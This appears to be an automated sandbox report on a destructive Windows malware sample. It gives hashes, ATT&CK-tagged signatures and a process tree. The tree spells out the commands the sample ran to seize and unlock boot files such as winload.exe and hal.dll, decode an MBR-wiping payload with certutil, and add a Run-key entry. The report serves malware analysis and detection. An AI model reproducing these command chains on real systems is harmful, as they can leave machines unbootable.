690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408

Analysis

max time kernel
9s
max time network
125s
platform
windows7_x64
resource
win7-20240729-en
resource tags

arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
submitted
18-11-2024 17:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ADZP 20 Complex.exe
Size

112KB
MD5

81a7a946456f1f6dae4715b1feb72ed0
SHA1

af83b938017efd53f95671adc0c6d2aa1088d38e
SHA256

690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408
SHA512

a1ec5c6b1ebb014aa60d0242e147ebbbadd2aff2a0e653b99f440f8d25bb01ee49cddcf6ad608c0adc8a5efc784ff2c949036b447da2912ccc6e684c2cc0e692
SSDEEP

3072:O7DhdC6kzWypvaQ0FxyNTBfHdIyEGfvBN+:OBlkZvaF4NTB/yyEGfvBQ

Score

8^/10

bootkit defense_evasion discovery evasion exploit persistence privilege_escalation upx

Malware Config

Signatures

Disables Task Manager via registry modification
evasion

Drops file in Drivers directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\rspndr.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\secdrv.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\smclib.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\ndistapi.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\partmgr.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\spldr.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\spsys.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\bxvbda.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\fileinfo.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\pcw.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\qwavedrv.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\watchdog.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\CmBatt.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\dmvsc.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\mskssrv.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\sfloppy.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\acpipmi.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\bridge.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\mcd.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\mouhid.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\pciidex.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\rasacd.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\nwifi.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\scsiport.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\storvsc.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\WUDFPf.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\BrFiltUp.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\BrSerId.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\bthmodem.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\usb8023.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\wacompen.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\ws2ifsl.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\RDPENCDD.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\sisraid4.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\BrSerWdm.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\dxapi.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\MegaSR.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\mrxsmb10.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\mspqm.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\pcmcia.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\terminpt.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\beep.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\hidbatt.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\hidclass.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\lltdio.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\ndiscap.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\Synth3dVsc.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\exfat.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\scfilter.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\srvnet.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\BrUsbSer.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\HpSAMD.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\tdi.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\discache.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\fastfat.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\mpio.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\mrxsmb.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\NV_AGP.SYS	attrib.exe
File opened for modification	C:\Windows\System32\drivers\adp94xx.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\fdc.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\iirsp.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\rdbss.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\UAGP35.SYS	attrib.exe
File opened for modification	C:\Windows\System32\drivers\rdpvideominiport.sys	attrib.exe

Modifies Windows Firewall 2 TTPs 13 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
14308	Process not Found
13588	Process not Found
7892	Process not Found
11212	Process not Found
10336	Process not Found
4860	netsh.exe
14156	Process not Found
14180	Process not Found
13340	netsh.exe
14204	Process not Found
1568	netsh.exe
4356	netsh.exe
4624	netsh.exe

Possible privilege escalation attempt 64 IoCs

exploit

pid	Process
6744	icacls.exe
10228	takeown.exe
5244	icacls.exe
5056	takeown.exe
4332	takeown.exe
10228	takeown.exe
1588	takeown.exe
13768	icacls.exe
11308	icacls.exe
12108	takeown.exe
3052	icacls.exe
4328	icacls.exe
3808	takeown.exe
13944	Process not Found
12992	icacls.exe
11752	icacls.exe
2124	takeown.exe
2516	takeown.exe
6612	icacls.exe
4692	takeown.exe
6124	takeown.exe
7164	takeown.exe
11268	takeown.exe
1436	takeown.exe
3088	takeown.exe
13656	takeown.exe
12824	Process not Found
2860	takeown.exe
3940	takeown.exe
4704	icacls.exe
9044	icacls.exe
11052	takeown.exe
9920	takeown.exe
4224	icacls.exe
4148	icacls.exe
4892	icacls.exe
4656	takeown.exe
10672	takeown.exe
780	icacls.exe
4260	takeown.exe
6416	icacls.exe
3236	takeown.exe
2552	icacls.exe
2892	takeown.exe
5080	takeown.exe
12924	takeown.exe
5480	icacls.exe
12168	takeown.exe
12780	icacls.exe
5772	takeown.exe
6480	takeown.exe
6176	icacls.exe
13016	takeown.exe
12188	takeown.exe
12008	takeown.exe
1728	takeown.exe
4736	takeown.exe
6880	takeown.exe
11436	icacls.exe
2512	icacls.exe
3936	icacls.exe
3276	icacls.exe
4356	icacls.exe
6864	takeown.exe

Drops startup file 5 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ADZP 20 Complex.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ADZP 20 Complex.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ADZP 20 Complex.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ADZP 20 Complex.exe	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ADZP 20 Complex.exe	cmd.exe

Executes dropped EXE 16 IoCs

pid	Process
1500	Tasksvc.exe
1524	ADZP 20 Complex.exe
1260	ADZP 20 Complex.exe
2884	ADZP 20 Complex.exe
2512	ADZP 20 Complex.exe
2716	ADZP 20 Complex.exe
780	ADZP 20 Complex.exe
2732	ADZP 20 Complex.exe
3136	ADZP 20 Complex.exe
3196	ADZP 20 Complex.exe
3256	ADZP 20 Complex.exe
3332	ADZP 20 Complex.exe
3428	ADZP 20 Complex.exe
4452	ADZP 20 Complex.exe
4508	ADZP 20 Complex.exe
4572	ADZP 20 Complex.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
12444	Process not Found
4652	takeown.exe
4688	takeown.exe
6368	icacls.exe
6864	takeown.exe
11064	icacls.exe
12760	icacls.exe
13544	icacls.exe
2644	icacls.exe
11956	icacls.exe
12780	takeown.exe
2712	icacls.exe
4932	icacls.exe
10072	takeown.exe
6480	takeown.exe
9480	takeown.exe
12780	icacls.exe
1256	takeown.exe
4148	icacls.exe
3692	icacls.exe
3936	icacls.exe
7056	takeown.exe
7208	takeown.exe
8372	takeown.exe
2516	takeown.exe
4892	icacls.exe
4704	takeown.exe
4692	takeown.exe
12008	takeown.exe
13856	Process not Found
2708	icacls.exe
4308	icacls.exe
3276	icacls.exe
5224	takeown.exe
4284	takeown.exe
4704	icacls.exe
6664	takeown.exe
4944	icacls.exe
4036	icacls.exe
11052	takeown.exe
12760	takeown.exe
10228	takeown.exe
6444	Process not Found
3008	Process not Found
2860	takeown.exe
4896	icacls.exe
5888	takeown.exe
4332	takeown.exe
4332	icacls.exe
9480	takeown.exe
13424	icacls.exe
4624	icacls.exe
4260	takeown.exe
6612	icacls.exe
6384	takeown.exe
11272	icacls.exe
12924	icacls.exe
13628	takeown.exe
4932	takeown.exe
6176	takeown.exe
12284	icacls.exe
12656	Process not Found
4272	icacls.exe
4716	takeown.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\EthernetKill = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EthernetKiller.cmd"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\EthernetKill = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EthernetKiller.cmd"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\EthernetKill = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EthernetKiller.cmd"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\EthernetKill = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EthernetKiller.cmd"	reg.exe

Deobfuscate/Decode Files or Information 1 TTPs 1 IoCs

Payload decoded via CertUtil.

defense_evasion

Deobfuscate/Decode Files or Information

T1140

pid	Process
1936	certutil.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\A:	format.com

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Modifies boot configuration data using bcdedit 10 IoCs

pid	Process
2140	bcdedit.exe
4148	bcdedit.exe
4260	bcdedit.exe
4716	bcdedit.exe
1972	Process not Found
7800	Process not Found
10956	Process not Found
2724	Process not Found
8684	Process not Found
12292	Process not Found

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	Tasksvc.exe

Drops autorun.inf file 1 TTPs 5 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	attrib.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\winload.exe	attrib.exe
File opened for modification	C:\Windows\System32\hal.dll	attrib.exe
File opened for modification	C:\Windows\System32\winresume.exe	attrib.exe

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0006000000019667-261.dat	upx
behavioral1/memory/1500-265-0x0000000000400000-0x000000000040E000-memory.dmp	upx
behavioral1/memory/1500-411-0x0000000000400000-0x000000000040E000-memory.dmp	upx

Drops file in Windows directory 12 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ADZP 20 Complex.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Tasksvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ADZP 20 Complex.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ADZP 20 Complex.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ADZP 20 Complex.exe

Gathers network information 2 TTPs 16 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
7104	ipconfig.exe
4668	ipconfig.exe
10948	ipconfig.exe
12132	ipconfig.exe
1068	ipconfig.exe
2804	ipconfig.exe
2492	ipconfig.exe
6484	ipconfig.exe
6632	ipconfig.exe
12008	ipconfig.exe
6900	ipconfig.exe
7096	ipconfig.exe
7156	ipconfig.exe
6136	ipconfig.exe
1084	ipconfig.exe
7140	ipconfig.exe

Modifies registry key 1 TTPs 64 IoCs

Modify Registry

T1112

pid	Process
3356	reg.exe
3792	reg.exe
3968	reg.exe
12236	reg.exe
11920	Process not Found
1900	reg.exe
7420	reg.exe
9440	reg.exe
12048	reg.exe
12340	reg.exe
4292	reg.exe
2008	reg.exe
8668	reg.exe
10080	reg.exe
10308	reg.exe
11712	reg.exe
2020	reg.exe
3836	reg.exe
4328	reg.exe
5988	reg.exe
2912	reg.exe
12184	reg.exe
10228	reg.exe
6132	Process not Found
8448	reg.exe
8596	reg.exe
13256	reg.exe
13284	reg.exe
12640	Process not Found
11252	Process not Found
3400	reg.exe
8684	reg.exe
10164	reg.exe
12260	reg.exe
1952	reg.exe
3268	reg.exe
13268	reg.exe
13740	Process not Found
4264	reg.exe
10008	reg.exe
10184	reg.exe
11508	reg.exe
13416	reg.exe
3584	reg.exe
6284	reg.exe
2664	reg.exe
2352	reg.exe
9232	reg.exe
14216	Process not Found
2536	Process not Found
6356	Process not Found
8504	reg.exe
8692	reg.exe
8968	reg.exe
13280	reg.exe
7000	reg.exe
7236	reg.exe
13144	Process not Found
13324	Process not Found
3844	reg.exe
4284	reg.exe
4348	reg.exe
10144	reg.exe
11052	reg.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 16 IoCs

pid	Process
1500	Tasksvc.exe
1524	ADZP 20 Complex.exe
1260	ADZP 20 Complex.exe
2884	ADZP 20 Complex.exe
2512	ADZP 20 Complex.exe
2716	ADZP 20 Complex.exe
780	ADZP 20 Complex.exe
2732	ADZP 20 Complex.exe
3136	ADZP 20 Complex.exe
3196	ADZP 20 Complex.exe
3256	ADZP 20 Complex.exe
3332	ADZP 20 Complex.exe
3428	ADZP 20 Complex.exe
4452	ADZP 20 Complex.exe
4508	ADZP 20 Complex.exe
4572	ADZP 20 Complex.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

description	pid	Process
Token: SeTakeOwnershipPrivilege	2860	takeown.exe
Token: SeTakeOwnershipPrivilege	2740	takeown.exe
Token: SeTakeOwnershipPrivilege	2848	takeown.exe
Token: SeTakeOwnershipPrivilege	2884	takeown.exe
Token: SeTakeOwnershipPrivilege	488	takeown.exe
Token: SeTakeOwnershipPrivilege	1588	takeown.exe
Token: SeTakeOwnershipPrivilege	1256	takeown.exe
Token: SeTakeOwnershipPrivilege	2124	takeown.exe
Token: SeTakeOwnershipPrivilege	2516	takeown.exe
Token: SeTakeOwnershipPrivilege	1436	takeown.exe
Token: SeTakeOwnershipPrivilege	2892	takeown.exe
Token: SeTakeOwnershipPrivilege	1456	takeown.exe
Token: SeTakeOwnershipPrivilege	2716	takeown.exe
Token: SeTakeOwnershipPrivilege	2188	takeown.exe
Token: SeTakeOwnershipPrivilege	1728	takeown.exe
Token: SeTakeOwnershipPrivilege	1984	takeown.exe
Token: SeTakeOwnershipPrivilege	1896	takeown.exe

Suspicious use of SetWindowsHookEx 30 IoCs

pid	Process
2796	mspaint.exe
2544	mspaint.exe
2904	mspaint.exe
2544	mspaint.exe
2796	mspaint.exe
2904	mspaint.exe
2796	mspaint.exe
2544	mspaint.exe
2904	mspaint.exe
2796	mspaint.exe
2544	mspaint.exe
2904	mspaint.exe
2444	mspaint.exe
2240	mspaint.exe
452	mspaint.exe
3216	mspaint.exe
3120	mspaint.exe
3308	mspaint.exe
3324	mspaint.exe
3412	mspaint.exe
3564	mspaint.exe
2444	mspaint.exe
2240	mspaint.exe
452	mspaint.exe
3216	mspaint.exe
3120	mspaint.exe
3308	mspaint.exe
3324	mspaint.exe
3412	mspaint.exe
3564	mspaint.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1508 wrote to memory of 2300	1508	ADZP 20 Complex.exe	31
PID 1508 wrote to memory of 2300	1508	ADZP 20 Complex.exe	31
PID 1508 wrote to memory of 2300	1508	ADZP 20 Complex.exe	31
PID 1508 wrote to memory of 2300	1508	ADZP 20 Complex.exe	31
PID 2300 wrote to memory of 2824	2300	cmd.exe	32
PID 2300 wrote to memory of 2824	2300	cmd.exe	32
PID 2300 wrote to memory of 2824	2300	cmd.exe	32
PID 2300 wrote to memory of 2860	2300	cmd.exe	34
PID 2300 wrote to memory of 2860	2300	cmd.exe	34
PID 2300 wrote to memory of 2860	2300	cmd.exe	34
PID 2300 wrote to memory of 2772	2300	cmd.exe	35
PID 2300 wrote to memory of 2772	2300	cmd.exe	35
PID 2300 wrote to memory of 2772	2300	cmd.exe	35
PID 2824 wrote to memory of 2740	2824	cmd.exe	36
PID 2824 wrote to memory of 2740	2824	cmd.exe	36
PID 2824 wrote to memory of 2740	2824	cmd.exe	36
PID 2300 wrote to memory of 2748	2300	cmd.exe	37
PID 2300 wrote to memory of 2748	2300	cmd.exe	37
PID 2300 wrote to memory of 2748	2300	cmd.exe	37
PID 2300 wrote to memory of 2848	2300	cmd.exe	38
PID 2300 wrote to memory of 2848	2300	cmd.exe	38
PID 2300 wrote to memory of 2848	2300	cmd.exe	38
PID 2300 wrote to memory of 2852	2300	cmd.exe	39
PID 2300 wrote to memory of 2852	2300	cmd.exe	39
PID 2300 wrote to memory of 2852	2300	cmd.exe	39
PID 2300 wrote to memory of 2928	2300	cmd.exe	40
PID 2300 wrote to memory of 2928	2300	cmd.exe	40
PID 2300 wrote to memory of 2928	2300	cmd.exe	40
PID 2300 wrote to memory of 2884	2300	cmd.exe	41
PID 2300 wrote to memory of 2884	2300	cmd.exe	41
PID 2300 wrote to memory of 2884	2300	cmd.exe	41
PID 2300 wrote to memory of 2644	2300	cmd.exe	42
PID 2300 wrote to memory of 2644	2300	cmd.exe	42
PID 2300 wrote to memory of 2644	2300	cmd.exe	42
PID 2300 wrote to memory of 2704	2300	cmd.exe	43
PID 2300 wrote to memory of 2704	2300	cmd.exe	43
PID 2300 wrote to memory of 2704	2300	cmd.exe	43
PID 2300 wrote to memory of 1936	2300	cmd.exe	44
PID 2300 wrote to memory of 1936	2300	cmd.exe	44
PID 2300 wrote to memory of 1936	2300	cmd.exe	44
PID 2300 wrote to memory of 1500	2300	cmd.exe	45
PID 2300 wrote to memory of 1500	2300	cmd.exe	45
PID 2300 wrote to memory of 1500	2300	cmd.exe	45
PID 2300 wrote to memory of 1500	2300	cmd.exe	45
PID 2300 wrote to memory of 960	2300	cmd.exe	46
PID 2300 wrote to memory of 960	2300	cmd.exe	46
PID 2300 wrote to memory of 960	2300	cmd.exe	46
PID 2300 wrote to memory of 2548	2300	cmd.exe	47
PID 2300 wrote to memory of 2548	2300	cmd.exe	47
PID 2300 wrote to memory of 2548	2300	cmd.exe	47
PID 2300 wrote to memory of 980	2300	cmd.exe	100
PID 2300 wrote to memory of 980	2300	cmd.exe	100
PID 2300 wrote to memory of 980	2300	cmd.exe	100
PID 2300 wrote to memory of 1084	2300	cmd.exe	50
PID 2300 wrote to memory of 1084	2300	cmd.exe	50
PID 2300 wrote to memory of 1084	2300	cmd.exe	50
PID 2300 wrote to memory of 1660	2300	cmd.exe	191
PID 2300 wrote to memory of 1660	2300	cmd.exe	191
PID 2300 wrote to memory of 1660	2300	cmd.exe	191
PID 2300 wrote to memory of 1320	2300	cmd.exe	52
PID 2300 wrote to memory of 1320	2300	cmd.exe	52
PID 2300 wrote to memory of 1320	2300	cmd.exe	52
PID 2300 wrote to memory of 880	2300	cmd.exe	53
PID 2300 wrote to memory of 880	2300	cmd.exe	53

Views/modifies file attributes 1 TTPs 64 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1772	attrib.exe
4940	attrib.exe
2988	attrib.exe
5988	attrib.exe
2748	attrib.exe
3156	attrib.exe
13220	attrib.exe
12992	attrib.exe
4516	attrib.exe
12188	attrib.exe
12960	attrib.exe
13880	attrib.exe
6568	attrib.exe
13564	attrib.exe
2444	attrib.exe
1560	attrib.exe
7016	attrib.exe
13192	attrib.exe
2928	attrib.exe
1816	attrib.exe
4520	attrib.exe
5036	attrib.exe
12400	attrib.exe
13208	attrib.exe
11780	attrib.exe
624	attrib.exe
2184	attrib.exe
3224	attrib.exe
7000	attrib.exe
4036	attrib.exe
4668	attrib.exe
6752	attrib.exe
6052	Process not Found
4304	attrib.exe
6444	attrib.exe
13204	attrib.exe
1940	attrib.exe
6772	attrib.exe
7084	attrib.exe
7372	attrib.exe
12176	attrib.exe
13012	attrib.exe
6300	Process not Found
6848	attrib.exe
11732	attrib.exe
2080	attrib.exe
13636	attrib.exe
4740	attrib.exe
5040	attrib.exe
6416	attrib.exe
3276	attrib.exe
5800	attrib.exe
13228	attrib.exe
12160	attrib.exe
1320	attrib.exe
11748	attrib.exe
14316	Process not Found
7764	attrib.exe
4820	attrib.exe
4968	attrib.exe
3440	attrib.exe
1188	attrib.exe
13276	attrib.exe
2024	attrib.exe

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1508
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B3B5.tmp\B3B6.tmp\B3B7.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
  2⤵
  - Drops startup file
  - Drops autorun.inf file
  - Suspicious use of WriteProcessMemory
  PID:2300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K Taskdl.bat
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2824
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32" /r
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2740
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\winresume.exe"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2860
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\winresume.exe" /reset /c /q
    3⤵
    PID:2772
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
    3⤵
    - Drops file in System32 directory
    - Views/modifies file attributes
    PID:2748
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\winload.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2848
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\winload.exe" /reset /c /q
    3⤵
    PID:2852
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\winload.exe"
    3⤵
    - Drops file in System32 directory
    PID:2928
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\hal.dll"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2884
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\hal.dll" /reset /c /q
    3⤵
    - Modifies file permissions
    PID:2644
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\hal.dll"
    3⤵
    - Drops file in System32 directory
    PID:2704
- - C:\Windows\system32\certutil.exe
    certutil -decode "C:\Users\Admin\AppData\Local\Temp\KillMBR.Shingapi.tmp" "Tasksvc.exe"
    3⤵
    - Deobfuscate/Decode Files or Information
    PID:1936
- - C:\Users\Admin\AppData\Local\Temp\Tasksvc.exe
    Tasksvc.exe
    3⤵
    - Executes dropped EXE
    - Writes to the Master Boot Record (MBR)
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1500
- - C:\Windows\system32\wscript.exe
    WScript Informacion.vbs
    3⤵
    PID:960
- - C:\Windows\system32\rundll32.exe
    rundll32 user32.dll, SetCursorPos
    3⤵
    PID:2548
- - C:\Windows\system32\rundll32.exe
    rundll32 user32.dll, SwapMouseButton
    3⤵
    PID:980
- - C:\Windows\system32\ipconfig.exe
    ipconfig /release
    3⤵
    - Gathers network information
    PID:1084
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
    3⤵
    - Adds Run key to start application
    PID:1660
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h *.*
    3⤵
    - Drops autorun.inf file
    - Views/modifies file attributes
    PID:1320
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:880
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:2052
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:1472
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:1968
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:1964
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:1680
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:3028
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:2084
